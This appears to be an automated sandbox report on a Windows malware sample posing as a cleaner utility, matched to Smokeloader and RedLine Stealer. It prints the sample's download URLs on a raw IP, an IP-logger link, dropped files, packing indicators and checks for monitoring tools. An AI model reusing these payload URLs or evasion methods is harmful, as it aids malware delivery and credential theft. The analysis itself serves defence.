Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadc:y
Source: file.exe, 00000000.00000003.2152414273.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadeep-Al
Source: file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloader:
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadi5c
Source: file.exe, 00000000.00000003.2152414273.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127311530.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadj
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127338582.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101877799.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadm:g
Source: file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127338582.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076612201.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101877799.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadq:
Source: file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloads5
Source: file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadt
Source: file.exe, 00000000.00000002.2665430518.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadvy$
Source: file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downe:
Source: file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D200_2_00403D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC00_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F500_2_00404F50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109000_2_00410900
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3060_2_0041A306
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB870_2_0040EB87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E190_2_00415E19
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EEC90_2_0040EEC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156EE0_2_004156EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6900_2_0040B690
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009520A00_2_009520A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009288550_2_00928855
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082586D0_2_0082586D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008442330_2_00844233
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00999BA90_2_00999BA9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099ECC20_2_0099ECC2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009965970_2_00996597
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099369B0_2_0099369B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009916300_2_00991630
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B6570_2_0099B657
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098FFB80_2_0098FFB8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008587650_2_00858765
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A076A0_2_009A076A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D151B70_2_04D151B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1EDEE0_2_04D1EDEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D13F870_2_04D13F87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1B8F70_2_04D1B8F7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D151B70_2_04D151B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D259550_2_04D25955
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1F1300_2_04D1F130
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D20B670_2_04D20B67
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3EE10_2_009A3EE1
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04D1A9C7 appears 34 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580
Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2453211940.00000000057C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.2452413532.0000000005FE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.2452876649.00000000057A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4D0FE CreateToolhelp32Snapshot,Module32First,0_2_00F4D0FE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7324
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzENJump to behavior
Source: C:\Users\user\Desktop\file.exeCommand line argument: emp0_2_00408770
Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_00408770
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 44%
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe
Source: file.exeStatic file information: File size 1979904 > 1048576
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: file.exeStatic PE information: Raw size of dinlulrd is bigger than: 0x100000 < 0x1b1400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dinlulrd:EW;jiwmyjir:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: file.exeStatic PE information: real checksum: 0x1eb816 should be: 0x1ed637
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: dinlulrd
Source: file.exeStatic PE information: section name: jiwmyjir
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A1F7 push ecx; ret 0_2_0040A20A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009520A0 push edx; mov dword ptr [esp], 2FCE50C1h0_2_009520C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00945811 push esi; mov dword ptr [esp], 32DCFEB0h0_2_00945828
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00945811 push eax; mov dword ptr [esp], 3BF50666h0_2_00945833
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928855 push edx; mov dword ptr [esp], ebp0_2_009288A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928855 push eax; mov dword ptr [esp], edx0_2_0092893B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928855 push esi; mov dword ptr [esp], ebx0_2_0092894A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094E04E push eax; mov dword ptr [esp], 3C058BACh0_2_0094E099
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094E04E push 518C2659h; mov dword ptr [esp], edx0_2_0094E121
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008261AF push ecx; iretd 0_2_008261B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085C1E4 push edx; mov dword ptr [esp], 7BFEA781h0_2_0085C1F1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085C1E4 push eax; mov dword ptr [esp], edi0_2_0085C206
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085C1E4 push edx; mov dword ptr [esp], ebp0_2_0085C23D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008289E1 push esi; iretd 0_2_008289E3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009009E3 push edx; mov dword ptr [esp], ebp0_2_009009F3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push 484E23A8h; mov dword ptr [esp], eax0_2_00844283
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push 108D1BD0h; mov dword ptr [esp], edx0_2_00844294
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push 1FFA1F06h; mov dword ptr [esp], eax0_2_00844343
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push 28FE171Eh; mov dword ptr [esp], ecx0_2_0084434B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push ebp; mov dword ptr [esp], edx0_2_0084435A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push esi; mov dword ptr [esp], edi0_2_008443FF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push 687254A7h; mov dword ptr [esp], edx0_2_0084441F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00844233 push 13909D20h; mov dword ptr [esp], ecx0_2_00844475
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00831246 push eax; mov dword ptr [esp], edx0_2_0083128C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00831246 push 595B47BBh; mov dword ptr [esp], edx0_2_008312F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097239F push ecx; mov dword ptr [esp], ebp0_2_0097243E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097239F push ecx; mov dword ptr [esp], 58FF4EF0h0_2_00972446
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097239F push 0A65BDF8h; mov dword ptr [esp], ebp0_2_00972487
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097239F push ecx; mov dword ptr [esp], 5DD03944h0_2_009724EA
Source: file.exeStatic PE information: section name: dinlulrd entropy: 7.940454687129734
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
